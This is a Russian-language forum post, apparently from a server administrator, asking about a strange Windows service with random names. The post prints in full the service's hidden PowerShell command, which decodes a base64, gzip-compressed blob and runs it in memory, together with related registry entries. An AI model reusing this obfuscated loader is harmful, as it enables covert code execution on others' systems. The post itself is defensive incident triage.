(Пожалуйста, прости меня, если я отправил это в неправильном обмене).
У нас была проблема с одним из наших серверов сегодня утром из-за теста генератора. При более внимательном рассмотрении служб мы обнаружили, что одна служба не запустилась, и мы ее быстро запустили.
Однако ниже по списку я наткнулся на очень странно выглядящий сервис с отображаемым именем yxEnkdrZymWygFLx
. Служба была ручной, и при ближайшем рассмотрении было обнаружено следующее:
C:\WINDOWS\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden
-c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop
-w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String
(''H4sIAP3mZVQCA71WbW/aSBD+nEr9D1aFZFvngB1I8yJVOtuEAMG8mUASiqLFXpuFt
ZfYa17a63+/MdgJvaS9Xj+cFZT1zszu7PM8M2svCR1OWChMZ7Hd6OHHeDEUvr5/d9RFE
QoEqbA6rShCYYWdvunO5aMjMBXCiDmV4YasH1FH+CRIY325rLIAkXByeWkmUYRDvn8vX
mOuxzEOppTgWJKFv4TRDEf4uDOdY4cLX4XCY/GasimimdvWRM4MC8d66Ka2FnNQml/RX
lLCJfHzZ1EeH2uT4tVTgmgsifY25jgoupSKsvBNTjccbJdYEi3iRCxmHi+OSFg+Kd6GM
fJwG1ZbYQvzGXNjUYbTwF+EeRKFwnfnShfau0kiDLtg0l03wjFEFRvhii2wVAgTShXhT
2mcZdFPQk4CDHaOI7a0cbQiDo6LdRS6FPexN5HaeJ0f/leDpMMg8OrySFaAmp+kazE3o
Xi/gii/TjilVYbngFrA4tv7d+/febki5vXG6lAKMDoa78YYEpW6LCY7v0+CqggWbIU4i
7bwWhhECZYnwjglYjyZCIXNde+iayTKj5fQcn/w5t1kfW+cYwbz4yEj7gTiMqoK86dH2
muklh+Lroo9EuLqNkQBcXJdSW9Bjz2Kd6ct5m5tyE0SMwN2q5hiH/EUREUYvw67Cgh/j
jUSQl0c6Q7QF0NWwKz8fTJ7XiSxEVo4ALT27yLQ4IGace6dKXib756+g5NoUhTHitBNo
JwcRbAxothVBD2MSWbSE852Q/ElXSuhnDgo5vlyE/kFyWxHk4UxjxIHKITTD+wldgiiK
RiKUCcuNrY28fOdxTehMBGlJPRhpRVQATMpBDZPhRFBkrkI5KKNeSNYUhyA2664axT5U
MpZIezEhHzsiq/TzCW+13MKSY7FQZLAs00ZV4QhiTh0iRTeZ039diIHfSJLyYxwxo2UF
8/Y2PJU8gWUXFxp2lm9dZaqO0drh03EAZdaxAIDxfhjxeYRoCZ9KHXItQ7PfSOklttcE
K2xhp8Fv1tSbrDqmXvTnNdLlmPG3evauU7W/to5b+uOR85rzTvw6xG1cU7UdQ932je6W
+sTbeHrbqdl9+fz7lXQajdiQ8vW2Mc6lUr9TtXL5UqnrC5c3Lwnmr/Q3XZA1psWjJ003
oA4tUGvmmZ/OjqpPYxovVSpzbwRi+2PFeqiqrXVdYO5ZWt7p/XZoO4ERqk0TJq6AUdab
mr9HjIDHa2rJW1o9G5rhn57ZfRQh3XLf8Dcg/tkjPwbZ33vIb2ht5ej5mnAekPqQkUP1
XuvNJw5hlrtXnTM+l2MuqbG6LSkjZiO/P5oeOKbJ87MK12MWu1gqSNd70E+I+QbbHTTH
5xC/EJrP+m1h8GL762x3obXM+9BO7OsTx9SkoHlwhd/07HCxwPaftShLRTFM0SBTmi5e
XHVWFTLWmiXkTRCkg4v1wWOQkzhQoIrK1eoTilz0p6+67lwn+y7/ATq7BaG5ZM3R7Lw7
Ci/9Ph86vLyAZIFuR9IsdjCoc9niropqyp0bXVTUeHYv35Oky230uGKStr8c8j+sRndb
SandVHYToe4NrhQ60//C65Zac7gn/tvuL7M/cT6S1iryjMSryzfT/wn0H8XhBEiHAJsa
C8U7y++t7HI5HTwnfBCF2jFy570662T8OM2fET8DZUmEcA4CgAA''));IEX (New-Obj
ect IO.StreamReader(New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';
$s.UseShellExecute=$false;$p=[System.Diagnostics.Process]::Start($s);
(Обратите внимание, что я разбил это на несколько строк, чтобы сделать его «читабельным»).
Сам сервис имел имя LzCNTZuKGyV
и выполнялся вручную под локальной системной учетной записью. (Я пока отключил процесс, пока не смогу понять, что это такое).
Я проверил реестр сервера и обнаружил несколько «устаревших» записей драйверов, все из которых указывают на службу:
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_LZCNTZUKGYV]
"NextInstance"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_LZCNTZUKGYV\0000]
"Service"="LzCNTZuKGyV"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="yxEnkdrZymWygFLx"
Мои вопросы:
- кто-нибудь видел что-нибудь подобное раньше?
- Может ли это быть какой-то формой вирусного / троянского сервиса?
- Есть ли способ перевести поток памяти Base 64 в коде выше?